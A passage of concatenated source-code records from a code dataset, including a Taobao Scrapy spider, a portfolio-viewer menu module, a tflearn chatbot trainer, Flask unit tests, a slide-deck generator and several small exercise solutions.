episodes\".format(100000))\n","sub_path":"agents/mc_fv_agent.py","file_name":"mc_fv_agent.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"640242173","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom urllib.parse import quote\nfrom scrapy import Request\nfrom scrapyseleiumtest.items import ProductItem\n\nclass TaobaoSpider(scrapy.Spider):\n name = 'taobao'\n allowed_domains = ['s.taobao.com']\n base_url = 'https://s.taobao.com/search?q='\n\n def start_requests(self):\n for keyword in self.settings.get('KEYWORDS'):\n for page in range(1, self.settings.get('MAX_PAGE') + 1):\n url = self.base_url + quote(keyword)\n yield Request(url=url, callback=self.parse, meta={'page': page}, dont_filter=True)\n\n\n def parse(self, response):\n products = response.css('div.grid-item.col')\n for product in products:\n item = ProductItem()\n item['price'] = product.css('.info-cont span.price.g_price.g_price-highlight strong::text').extract_first(),\n 
item['title'] = product.css('.info-cont .title-row a::attr(title)').extract_first()\n item['deal'] = product.css('.info-cont .col.end span.week-sale .num::text').extract_first()\n yield item\n\n\n","sub_path":"爬虫框架/Scrapy/scrapyseleiumtest/scrapyseleiumtest/spiders/taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"640337712","text":"\"\"\" Compiled: 2020-09-18 10:38:55 \"\"\"\n\n#__src_file__ = \"extensions/PortfolioViewer/etc/PortfolioViewerMenuItems.py\"\n\"\"\"--------------------------------------------------------------------------\nMODULE\n PortfolioViewerMenuItems\n\n (c) Copyright 2016 SunGard FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n \tModule containing the code for the menu items used in ribbons and \n right click menus in the Portfolio Viewer application.\n-----------------------------------------------------------------------------\"\"\"\n\nimport FUxCore\nimport acm\nimport PortfolioViewerDialogs\nimport PortfolioViewerFunctions\nimport PortfolioViewerConditionsDlg as ConditionalFunctions\n\n\"\"\" --- Class that handles ribbons and actions --- \"\"\"\nclass MenuItems(FUxCore.MenuItem):\n def __init__(self):\n self.m_application = None\n \n def Invoke(self, cd):\n commandName = cd.Definition().GetName().Text()\n if commandName == 'ViewSettings':\n PortfolioViewerFunctions.OpenSettings(self.m_application)\n\n #Column commands\n elif commandName == 'columnSelection_list':\n if self.m_application.userSettings.At('defDataType') == 'Portfolio':\n PortfolioViewerFunctions.ColumnSelection(self.m_application, 'Portfolio')\n else:\n PortfolioViewerFunctions.ColumnSelection(self.m_application, 'Depot')\n elif commandName == 'columnsSelection_clnt':\n PortfolioViewerFunctions.ColumnSelection(self.m_application, 'Client')\n elif commandName == 'columnSelection_cond':\n PortfolioViewerFunctions.ColumnSelection(self.m_application, 'Condition')\n \n #Create new commands\n elif commandName == 'new_prfOrDepot':\n if self.m_application.userSettings.At('defDataType') == 'Portfolio':\n if PortfolioViewerDialogs.StartCreationDialog(self.m_application, None): #Portfolio created\n PortfolioViewerFunctions.PortfolioSearch(self.m_application, None) #Reload results\n elif self.m_application.userSettings.At('defDataType') == 'Depot':\n acm.UX().SessionManager().StartApplication('Party Definition', None)\n elif commandName == 'new_condition':\n if ConditionalFunctions.StartNewConditionDlg(self.m_application):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n\n elif commandName == 'ClearFields':\n PortfolioViewerFunctions.clearAllFields(self.m_application)\n elif commandName == 'DoSearch':\n if self.m_application.userSettings.At('defDataType') == 'Portfolio':\n PortfolioViewerFunctions.PortfolioSearch(self.m_application, None)\n elif self.m_application.userSettings.At('defDataType') == 'Depot':\n PortfolioViewerFunctions.PartySearch(self.m_application, None)\n elif commandName == 'CondModels':\n acm.UX().SessionManager().StartApplication('Charges', None)\n\n #portfolio right click commands\n elif commandName == 'setCompoundNode':\n PortfolioViewerFunctions.SetCompoundNode(self.m_application, None)\n elif commandName == 'openInAdminConsole':\n PortfolioViewerFunctions.OpenConditionCustom(self.m_application, True)\n elif commandName == 'openPortfolio':\n PortfolioViewerFunctions.OpenPortfolio(self.m_application, None)\n \n #client and depot 
right click commands\n elif commandName == 'ClientGroups':\n acm.UX().SessionManager().StartApplication('Party Groups', acm.FPartyGroup[cd.Definition().GetTooltip().Text()])\n elif commandName == 'newDepotWParent':\n if PortfolioViewerDialogs.NewDepotDlg(self.m_application):\n PortfolioViewerFunctions.PartySearch(self.m_application, None)\n\n #Shared right click commands (portfolio and depot)\n elif commandName == 'showConditions':\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n \n #Conditions and commissions\n elif commandName == 'openSelCondition':\n PortfolioViewerFunctions.OpenConditionCustom(self.m_application, None)\n elif commandName == 'newPrfCondition':\n if PortfolioViewerFunctions.NewPortfolioCondition(self.m_application, None):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n elif commandName == 'newDepCondition':\n if PortfolioViewerFunctions.NewPartyCondition(self.m_application, None):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n elif commandName == 'newCondforModel':\n if ConditionalFunctions.OpenConditionDlg(self.m_application, self.m_application.treeView.GetSelectedItem().GetData(), None):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n\n elif commandName == 'copyConditions':\n PortfolioViewerFunctions.CopyConditionsFrom(self.m_application)\n\n # Condition overview commands\n elif commandName == 'overviewModelsUpdateCondition':\n model = acm.FConditionalValueModel[cd.Definition().GetTooltip().Text()]\n if PortfolioViewerFunctions.ChangeConditionValue(self.m_application, model):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n elif commandName == 'overviewModelsSpecialCondition':\n model = acm.FConditionalValueModel[cd.Definition().GetTooltip().Text()]\n if PortfolioViewerFunctions.NewOverviewCondition(self.m_application, model):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n elif commandName == 'overviewModelsDefaultCondition':\n model = acm.FConditionalValueModel[cd.Definition().GetTooltip().Text()]\n if ConditionalFunctions.OpenConditionDlg(self.m_application, model, None):\n PortfolioViewerFunctions.UpdateConditionalModels(self.m_application, None)\n\n else: \n pass\n \n def Applicable(self):\n return True\n\n def Enabled(self):\n return True\n\n def Checked(self):\n return False\n\n def SetApplication(self, application):\n self.m_application = application\n\nclass TypeMenuItems(FUxCore.MenuItem):\n def __init__(self):\n self.m_application = None\n self.checked = False\n \n def Invoke(self, cd):\n commandName = cd.Definition().GetName().Text()\n if commandName == 'use_Portfolio':\n self.m_application.userSettings.AtPut('defDataType', 'Portfolio')\n PortfolioViewerFunctions.ChangeType(self.m_application, None)\n elif commandName == 'use_Depot':\n self.m_application.userSettings.AtPut('defDataType', 'Depot')\n PortfolioViewerFunctions.ChangeType(self.m_application, None)\n else: \n pass\n \n def Applicable(self):\n return True\n\n def Checked(self):\n return self.checked\n\n def SetApplication(self, application):\n self.m_application = application\n\n\"\"\" End of file \"\"\"\n","sub_path":"Extensions/Portfolio Viewer/FPythonCode/PortfolioViewerMenuItems.py","file_name":"PortfolioViewerMenuItems.py","file_ext":"py","file_size_in_byte":7184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"354153555","text":"# Things we need for 
NLP\nimport nltk\nfrom chatbot.utils import lemmatize_words\n\n# Things we need for Tensorflow\nimport numpy as np\nimport tflearn\nimport tensorflow as tf\nimport random\n\nimport json\nimport pickle\nfrom service_api import constant as ct\n\n\ndef create_chatbot_data():\n\n with open(ct.INTENTS_JSON) as json_data:\n intents = json.load(json_data)\n\n words = []\n classes = []\n documents = []\n\n for intent in intents[ct.INTENTS]:\n for pattern in intent[ct.PATTERNS]:\n w = nltk.word_tokenize(pattern)\n words.extend(w)\n documents.append((w, intent[ct.TAG]))\n if intent[ct.TAG] not in classes:\n classes.append(intent[ct.TAG])\n\n words = lemmatize_words([w.lower() for w in words])\n words = sorted(list(set(words)))\n\n classes = sorted(list(set(classes)))\n\n print(len(documents), 'documents')\n print(len(classes), 'classes', classes)\n print(len(words), 'unique lemmatized words', words)\n\n training = []\n\n output_empty = [0] * len(classes)\n\n for doc in documents:\n bag = []\n pattern_words = doc[0]\n pattern_words = lemmatize_words([w.lower() for w in pattern_words])\n for w in words:\n bag.append(1) if w in pattern_words else bag.append(0)\n\n output_row = list(output_empty)\n output_row[classes.index(doc[1])] = 1\n\n training.append([bag, output_row])\n\n random.shuffle(training)\n training = np.array(training)\n\n train_x = list(training[:, 0])\n train_y = list(training[:, 1])\n\n tf.reset_default_graph()\n net = tflearn.input_data(shape=[None, len(train_x[0])])\n net = tflearn.fully_connected(net, 8)\n net = tflearn.fully_connected(net, 8)\n net = tflearn.fully_connected(net, len(train_y[0]), activation=ct.SOFTMAX)\n net = tflearn.regression(net)\n\n model = tflearn.DNN(net, tensorboard_dir=ct.TF_LOGS)\n model.fit(train_x, train_y, n_epoch=1000, batch_size=8, show_metric=True)\n model.save(ct.MODEL_TF)\n\n pickle.dump({ct.WORDS: words, ct.CLASSES: classes, ct.TRAIN_X: train_x, ct.TRAIN_Y: train_y},\n open(ct.TRAINING_DATA, \"wb\"))\n\n\ndef main():\n create_chatbot_data()\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"chatbot/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"600621593","text":"# https://www.reddit.com/r/dailyprogrammer/comments/3r7wxz/20151102_challenge_239_easy_a_game_of_threes/\n\nimport sys\nimport random\n\ntry:\n number = int(sys.argv[1])\nexcept ValueError:\n print(\"You must enter an integer.\")\n sys.exit(0)\n\nwhile number > 1:\n if number % 3 == 0:\n number /= 3\n print('{:.0f} 0'.format(number))\n else:\n add = random.choice([1, -1])\n number += add\n print('{:.0f} {}'.format(number, add))\nprint(\"{:.0f}\".format(number))\n","sub_path":"Python/Easy/E239.py","file_name":"E239.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"294385381","text":"from django.db import models\n\n\n# Create your models here.\n\nclass Recipe(models.Model):\n \"\"\"docstring for Post\"\"\"\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=2000)\n author = models.ForeignKey('auth.User')\n ingredients = models.TextField(null=True)\n likes = models.IntegerField(default=0)\n views = models.IntegerField(default=0)\n published_date = models.DateTimeField(\n blank=True, null=True)\n\n def __str__(self):\n return self.name\n\n def increment_views(self):\n self.views += 1\n self.save()\n\n def 
increment_likes(self):\n self.likes += 1\n self.save()\n\n def decrement_likes(self):\n self.likes -= 1\n self.save()\n\n","sub_path":"foody/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"391561885","text":"\"\"\"\nProblem link: https://codingcompetitions.withgoogle.com/kickstart/round/0000000000434c0e/0000000000434ba7\n\"\"\"\nT = int(input())\n\nfor test_case in range(T):\n\n N = int(input())\n skater_name = [input() for card_num in range(N)]\n\n alpha_num = {\n \" \": 1,\n\n \"A\": 2,\n \"B\": 3,\n \"C\": 4,\n \"D\": 5,\n \"E\": 6,\n \"F\": 7,\n \"G\": 8,\n \"H\": 9,\n \"I\": 10,\n \"J\": 11,\n \"K\": 12,\n \"L\": 13,\n \"M\": 14,\n \"N\": 15,\n \"O\": 16,\n \"P\": 17,\n \"Q\": 18,\n \"R\": 19,\n \"S\": 20,\n \"T\": 21,\n \"U\": 22,\n \"V\": 23,\n \"W\": 24,\n \"X\": 25,\n \"Y\": 26,\n \"Z\": 27,\n\n \"a\": 28,\n \"b\": 29,\n \"c\": 30,\n \"d\": 31,\n \"e\": 32,\n \"f\": 33,\n \"g\": 34,\n \"h\": 35,\n \"i\": 36,\n \"j\": 37,\n \"k\": 38,\n \"l\": 39,\n \"m\": 40,\n \"n\": 41,\n \"o\": 42,\n \"p\": 43,\n \"q\": 44,\n \"r\": 45,\n \"s\": 46,\n \"t\": 47,\n \"u\": 48,\n \"v\": 49,\n \"w\": 50,\n \"x\": 51,\n \"y\": 52,\n \"z\": 53\n }\n\n name_value_pairs = {}\n\n for name in skater_name:\n value = \"\"\n for alph in name:\n value += str(alpha_num.get(alph))\n\n name_value_pairs[int(value)] = name\n\n sorted_dict = {\n k: v for k, v in sorted(name_value_pairs.items(), key=lambda item: item[1])\n }\n\n sorted_list = [name for name in sorted_dict.values()]\n changes = 0\n\n for index in range(len(sorted_list)):\n if sorted_list[index] != skater_name[index]:\n changes += 0.5\n\n print(\"Case #{}: {}\".format(test_case + 1, int(changes)))\n","sub_path":"2015/Practice Round/moist.py","file_name":"moist.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"180858268","text":"import sys\nimport os\nPROJECT_HOME = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '../../'))\nsys.path.append(PROJECT_HOME)\nfrom flask.ext.testing import TestCase\nfrom flask import url_for, Flask\nfrom models import db, GraphicsModel\nfrom sqlalchemy import Column, Integer, String, DateTime, Boolean\nfrom sqlalchemy.dialects import postgresql\nimport unittest\nimport requests\nimport app\nimport mock\nimport json\nfrom datetime import datetime\n\n\ndef get_testdata():\n global figures\n figures = [{\"images\": [{\"image_id\": \"fg1\", \"format\": \"gif\",\n \"thumbnail\": \"fg1_thumb_url\", \"highres\":\n \"fg1_highres_url\"}],\n \"figure_caption\": \"Figure 1\",\n \"figure_label\": \"Figure 1\",\n \"figure_id\": \"fg1\"}]\n g = GraphicsModel(\n bibcode='9999BBBBBVVVVQPPPPI',\n doi='DOI',\n source='TEST',\n eprint=False,\n figures=figures,\n modtime=datetime.now()\n )\n return g\n\n\nclass TestExpectedResults(TestCase):\n\n def create_app(self):\n '''Create the wsgi application'''\n app_ = app.create_app()\n db.session = mock.Mock()\n one = db.session.query.return_value.filter.return_value.one\n one.return_value = get_testdata()\n return app_\n\n def test_data_model(self):\n '''Check that data model for graphics is what we expect'''\n ic = Column(Integer)\n sc = Column(String)\n bc = Column(Boolean)\n jc = Column(postgresql.JSON)\n dc = Column(DateTime)\n cols_expect = map(\n type, [ic.type, sc.type, sc.type, sc.type, bc.type,\n jc.type, dc.type])\n self.assertEqual([type(c.type)\n 
for c in GraphicsModel.__table__.columns],\n cols_expect)\n\n def test_query_1(self):\n '''Check that session mock behaves the way we set it up'''\n expected_attribs = ['modtime', 'bibcode', 'source',\n '_sa_instance_state', 'eprint',\n 'figures', 'id', 'doi']\n resp = db.session.query(GraphicsModel).filter(\n GraphicsModel.bibcode == '9999BBBBBVVVVQPPPPI').one()\n self.assertEqual(sorted(resp.__dict__.keys()), sorted(expected_attribs))\n\n def test_query(self):\n '''Query endpoint with bibcode from stub data should\n return expected results'''\n url = url_for('graphics', bibcode='9999BBBBBVVVVQPPPPI')\n r = self.client.get(url)\n self.assertTrue(r.status_code == 200)\n self.assertTrue(r.json.get('figures') == figures)\n self.assertTrue(r.json.get('bibcode') == '9999BBBBBVVVVQPPPPI')\n self.assertTrue(r.json.get('pick')['figure_label'] == 'Figure 1')\n\n\nclass TestDatabaseError(TestCase):\n\n def create_app(self):\n '''Create the wsgi application'''\n app_ = app.create_app()\n db.session = mock.Mock()\n one = db.session.query.return_value.filter.return_value.one\n one.return_value = Exception()\n return app_\n\n def test_query(self):\n '''An exception is returned representing the absence of\n a database connection'''\n url = url_for('graphics', bibcode='9999BBBBBVVVVQPPPPI')\n r = self.client.get(url)\n self.assertTrue(r.status_code == 500)\n\n\nclass TestJSONError(TestCase):\n\n def create_app(self):\n '''Create the wsgi application'''\n app_ = app.create_app()\n db.session = mock.Mock()\n one = db.session.query.return_value.filter.return_value.one\n one.return_value = 'a'\n return app_\n\n def test_query(self):\n '''An exception is returned when something goes wrong\n with JSON handling'''\n url = url_for('graphics', bibcode='9999BBBBBVVVVQPPPPI')\n r = self.client.get(url)\n self.assertTrue(r.status_code == 500)\n\n\nclass TestNoDataReturned(TestCase):\n\n def create_app(self):\n '''Create the wsgi application'''\n app_ = app.create_app()\n db.session = mock.Mock()\n one = db.session.query.return_value.filter.return_value.one\n one.return_value = {'figures': []}\n return app_\n\n def test_query(self):\n '''An error payload is returned when no row is found in the database'''\n url = url_for('graphics', bibcode='9999BBBBBVVVVQPPPPI')\n r = self.client.get(url)\n self.assertTrue(r.status_code == 200)\n self.assertTrue('Error' in r.json)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"service/tests/unittests/testEndpoint.py","file_name":"testEndpoint.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"28557229","text":"import time\n\nimport cv2\nimport numpy as np\nimport os\n# import matplotlib.pyplot as plt\n\nstepbystep = True\n\nmask = np.loadtxt('/home/jelle/PycharmProjects/UTMR/mask.txt')\nkernel = cv2.getStructuringElement(shape=0, ksize=(2, 2))\nmask = cv2.morphologyEx(mask, cv2.MORPH_GRADIENT, kernel)\n\nthelist = [(81, 76), (85, 83), (89, 91), (91, 99), (93, 107), (94, 115), (95, 123), (95, 130), (95, 138), (94, 146),\n (93, 154), (92, 162), (90, 170), (89, 177), (88, 185), (86, 193), (85, 201), (83, 209), (82, 217), (80, 225)]\n\n\"\"\"\"\nWhat is the concept:\n -remake dist determine\n\"\"\"\n\n\n\n\ndef dist_determine(point,mask):\n xcent, ycent = point\n\n # instead of drawing a full circle, draw a sparse one, consisting of 4 lines at\n # 0 degree (horizontal)\n # 30 degree\n # 60 degree\n # 90 degree (vertical)\n\n # predefine so we are FAST!\n # remember x = r*cos(theta) and y = r*sin(theta)\n val1 = 0.866 # cos(30), sin(60) sqrt(3)/2\n val2 = 0.5 # cos(60), sin(30)\n\n points = [None] * 12 # twelve sample points, filled in on every radius below\n\n for r in range(1,100): # r for radius\n sq = int(val1 * r)\n h = int(val2 * r)\n # quadrant 1\n points[0] = (r+xcent, 0+ycent)\n points[1] = (sq+xcent,h+ycent)\n points[2] = (h+xcent,sq+ycent)\n # quadrant 2\n points[3] = (0+xcent,r+ycent)\n points[4] = (-sq+xcent,h+ycent)\n points[5] = (-h+xcent,sq+ycent)\n # quadrant 3\n points[6] = (-r+xcent,0+ycent)\n points[7] = (-sq+xcent,-h+ycent)\n points[8] = (-h+xcent,-sq+ycent)\n # quadrant 4\n points[9] = (0+xcent,-r+ycent)\n points[10] = (h+xcent,-sq+ycent)\n points[11] = (sq+xcent,-h+ycent)\n\n if r > 24:\n print(points)\n\n for ii in range(12): # check all twelve sample points\n # gotta switch em w.r.t. array!\n if mask[(points[ii][1],points[ii][0])] == 255:\n return points[ii],r\n\n\nprint(dist_determine(thelist[0],mask))\n\nvmask = np.copy(mask)\n\nif stepbystep:\n for element in thelist:\n mask = cv2.circle(mask,element,5,255)\n print(f\"doing point{element}\")\n # There should be a better method than passing the entire mask all the time\n pointz, _ = dist_determine(element,vmask) # dist_determine returns (point, radius)\n mask = cv2.line(mask,element,pointz,255)\n\n cv2.imshow('cirq',mask)\n cv2.waitKey(0)\n\n\ndef display_time():\n # in the case of SMALL opps, python is a few orders faster than numpy ;-)\n t1 = time.perf_counter()\n for i in range(1000):\n a = np.array([5.24])\n b = a\n c=a+b\n t2 = time.perf_counter()\n\n t3 = time.perf_counter()\n for i in range(1000):\n a = 5.24\n b = a\n c=a+b\n t4 = time.perf_counter()\n\n print(f\"numpy took {t2-t1}, and python {t4-t3}\")","sub_path":"prototype/sanbox/from_scratch.py","file_name":"from_scratch.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"279149403","text":"from django.shortcuts import render\n\nfrom src.PlaceHelper import PlaceHelper\nfrom src.Requests import Requests\nfrom src.SearchValidation import SearchValidation\n\n\ndef index(request):\n return render(request, \"templates/index.html\")\n\n\ndef search(request):\n\n place_name = request.GET[\"place_name\"]\n place_type = request.GET[\"place_type\"]\n nearby_places = request.GET[\"nearby_places\"]\n\n message = SearchValidation.validate_place_name(place_name)\n\n if message[\"warning_message\"] == \"\":\n json = Requests.request_recife_metropolitan_area_places(place_name, place_type)\n PlaceHelper.extract_places(json)\n return render(request, \"templates/search.html\",\n {\"places\": PlaceHelper.places})\n else:\n return render(request, \"templates/search.html\", message)\n","sub_path":"simpatize/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"187999148","text":"\nh,w = map(int, input().split())\ns = []\nk_cnt =0\nfor _ in range(h):\n row = input()\n k_cnt += row.count('.')\n s.append(row)\n\ncnts = [ [0]*w for _ in range(h) ]\nfor i in range(h):\n curr = 0\n for j in range(w):\n c = s[i][j]\n if c == '#': curr = 0\n else:\n curr += 1\n cnts[i][j] += curr\n \n curr = 0\n for j in range(w-1,-1,-1):\n c = s[i][j]\n if c == '#': curr = 0\n else:\n curr += 1\n cnts[i][j] += (curr-1)\n\n\nfor j in range(w):\n curr = 0\n for i in range(h):\n c = s[i][j]\n if c == '#': curr = 0\n else:\n curr += 1\n cnts[i][j] += (curr-1)\n \n curr = 0\n for i in 
range(h-1,-1,-1):\n c = s[i][j]\n if c == '#': curr = 0\n else:\n curr += 1\n cnts[i][j] += (curr-1)\n\nans = 0\nMOD = 10**9+7\nall_num = pow(2,k_cnt,MOD)\n# print(all_num)\nfor i in range(h):\n for j in range(w):\n ans += (all_num-pow(2,k_cnt-cnts[i][j],MOD))\n ans %= MOD\n\nprint(ans)","sub_path":"1_contest/previous/hhkb2020/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"71605948","text":"import threading\nimport queue\nfrom bruteforce.pwdproducer import PwdProducer\nfrom bruteforce.pwdconsumer import PwdConsumer\n\nyour_list = 'abc'\ncomplete_list = []\nfor current in range(5):\n a = [i for i in your_list]\n for y in range(current):\n a = [x+i for i in your_list for x in a]\n complete_list = complete_list+a\n\nprint(complete_list)\n\ncomplete_list2 = []\nfor current in range(3):\n a = [i for i in your_list]\n print(a)\n\n for y in range(current):\n b = []\n for x in a:\n for i in your_list:\n b.append(x+i)\n print(b)\n a = [i for i in b]\n\n complete_list2 = complete_list2 + a\n\nprint(complete_list2)\n\n# queue = queue.Queue(maxsize=10)\n# condition = threading.Condition()\n#\n# producer = PwdProducer(queue, condition)\n# consumers = []\n# numConsumers = 5\n# for i in range(numConsumers):\n# consumers.append(PwdConsumer(queue, condition, complete_list))\n#\n# producer.start()\n# for i in range(numConsumers):\n# consumers[i].start()\n#\n# producer.join()\n# for i in range(numConsumers):\n# consumers[i].join()","sub_path":"bruteforcemain.py","file_name":"bruteforcemain.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"326509345","text":"from storedprocedures import stored_procedures\nfrom formatconversion import format_conversion\nfrom conversionslides import conversion_slides\nfrom formattraffic import format_traffic\nfrom trafficslide import traffic_slide\nfrom sendemail import send_email\nfrom emailsettings import *\nfrom settings import *\n\nfrom pptx import Presentation\nimport numpy as np\n\n# Create traffic figures\nimport trafficfigures\n\n# Create conversion figures\nimport conversionfigures\n\n# Execute stored procedures and format the data\ndf_t_tab, df_t_ser, df_c_12, df_c_52, df_c_tab = stored_procedures()\n\ndf_t_tab, df_t_tab1, df_t_tab2 = format_traffic(df_t_tab)\n\ndf_c_tab, df_c_12 = format_conversion(df_c_tab, df_c_12)\n\n# Create a blank presentation and define size\nprs = Presentation()\n\nprs.slide_height = np.int(5.625*914400)\nprs.slide_width = 10*914400\n\n# Create text\nslide_layout = prs.slide_layouts[6]\nslide = prs.slides.add_slide(slide_layout)\nshapes = slide.shapes\n\n# Generate traffic slide\nsection_name = df_t_tab['TrafficSectionName'].tolist()\nstart_date = df_t_tab['StartDate'].tolist()\nend_date = df_t_tab['EndDate'].tolist()\n\n# Traffic metrics\nmetrics = list(zip(section_name, start_date, end_date))\n\ntraffic_slide(slide, shapes, metrics, df_t_tab1, df_t_tab2,\n traf_header_lef, traf_header_top, traf_header_wid, traf_header_hei,\n traf_table1_lef, traf_table1_top, traf_table1_wid, traf_table1_hei,\n traf_table2_lef, traf_table2_top, traf_table2_wid, traf_table2_hei)\n\n# Generate conversion slides\nsection_name = df_c_tab['KeyPerformanceIndicator'].tolist()\nstart_date = df_c_tab['StartDate'].tolist()\nend_date = df_c_tab['EndDate'].tolist()\n\nmetrics = list(zip(section_name, start_date, end_date))\n\nconversion_slides(prs, 
slide_layout, metrics, df_c_tab, df_c_12,\n conv_header_lef, conv_header_top, conv_header_wid, conv_header_hei,\n conv_table1_lef, conv_table1_top, conv_table1_wid, conv_table1_hei,\n conv_table2_lef, conv_table2_top, conv_table2_wid, conv_table2_hei)\n\n# Save slide deck\nprs.save(file_out)\n\n# Email slide deck file\nsend_email(send_from, send_to, subject, message, files=[file_out],\n server=server, port=port, username=username,\n password=password, use_tls=True)","sub_path":"generateDeck/trafficConversion_v2.0/createslidedeck.py","file_name":"createslidedeck.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"371979115","text":"import unittest\nfrom helloworld import TextBoardViewer, Ship\n\n\ndef createShips():\n ships = []\n shipscounter = 0\n for i in range(4):\n ships.append(Ship(shipscounter, 1, []))\n shipscounter += 1\n for i in range(3):\n ships.append(Ship(shipscounter, 2, []))\n shipscounter += 1\n for i in range(2):\n ships.append(Ship(shipscounter, 3, []))\n shipscounter += 1\n for i in range(1):\n ships.append(Ship(shipscounter, 4, []))\n shipscounter += 1\n return ships # return the fleet so setUp actually receives a list\n\n\nclass TestState(unittest.TestCase):\n def setUp(self):\n self.ships = createShips()\n\n # tests PlaceShips -> Game transition\n def test_viewer(self):\n viewer = TextBoardViewer(None)\n viewer\n\n self.assertEqual(\"Game\", co.getstate().getname(self))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"testtextboardviewer.py","file_name":"testtextboardviewer.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"355201965","text":"class Solution:\n def partitionLabels(self, S: str) -> List[int]:\n # Find the last position in the string of each character\n ch2pos = {c: i for i, c in enumerate(S)}\n\n # loop through the string\n # - if the pos of the current word != cur pos\n # - loop through the positions after words and end at one that's not equal to the current one\n output = []\n j = anchor = 0\n for i, c in enumerate(S):\n j = max(j, ch2pos[c])\n if i == j:\n print(i, c)\n output.append(i - anchor + 1)\n anchor = i + 1\n return output\n","sub_path":"leetcode/lc763_Partition_Labels.py","file_name":"lc763_Partition_Labels.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"253656529","text":"import json\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom regression import *\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\n\n# Load the JSON file\nf = open('sns_hong.json','r', encoding='UTF-8')\norigin_data = json.load(f)\n\n#print(type(origin_data))\nprint('==========================')\nprint('Dataset example:')\nprint(origin_data[1])\n#print(type(origin_data[1]))\n#print(origin_data[1]['authorName'])\nprint(\"The dataset contains {} posts.\".format(len(origin_data)))\nprint('==========================\\n')\n\n# Build the user list\nuserNameList = []\nfor item in origin_data:\n if not (item['authorId'] in userNameList):\n userNameList.append(item['authorId'])\n for likes_user in item['likes']:\n if not (likes_user['userId'] in userNameList):\n userNameList.append(likes_user['userId'])\n# for comments_user in item['comments']:\n# if not (comments_user['authorName'] in userNameList):\n# userNameList.append(comments_user['authorName'])\n\nprint('==========================')\nprint('User list:')\nprint(userNameList)\nprint('The dataset contains {} users'.format(len(userNameList)))\nprint('==========================')\n\n# Build the item-indexed item-user list\nitemList = []\nSUMM = 0\nfor item in origin_data:\n itemDist = {}\n itemDist['snsId'] = item['snsId']\n itemDist['authorId'] = item['authorId']\n itemDist['likesSum'] = len(item['likes'])\n summ = 0\n for user in userNameList:\n itemDist[user] = 0\n for likes_user in item['likes']:\n if user == likes_user['userId']:\n itemDist[user] = 1\n summ = summ + 1\n else:\n itemDist[user] = 0\n SUMM = SUMM + summ\n itemList.append(itemDist)\n\nitemDataFrame = pd.DataFrame(itemList)\n\nprint(\"==========================\")\nprint(\"The dataset contains {} posts.\".format(len(itemList)))\nprint(\"Post list example:\")\nprint(itemList[1])\nLikesSUM = 0\nNonLikes = 0\nfor item in itemList:\n LikesSUM = LikesSUM+item['likesSum']\n #print(item['likesSum'])\n if item['likesSum'] == 0:\n NonLikes = NonLikes+1\nprint(\"There are {} like records in total.\".format(LikesSUM))\nprint(SUMM)\nprint(\"Out of {} posts, {} have no likes at all\".format(len(itemList), NonLikes))\nprint(\"==========================\")\n\n# Build the user-indexed user-item matrix\nuser_item = np.zeros((len(userNameList), len(itemList)))\n\nuser_index = 0\nitem_index = 0\nfor user in userNameList:\n for item in origin_data:\n for item_like in item['likes']:\n if user == item_like['userId']:\n user_item[user_index, item_index] = 1\n item_index = item_index + 1\n user_index = user_index + 1\n item_index = 0\n\nprint(user_item.shape)\n\n# Check that the user-item matrix contains every like record\nSUMM = 0\nfor i in range(len(userNameList)):\n for j in 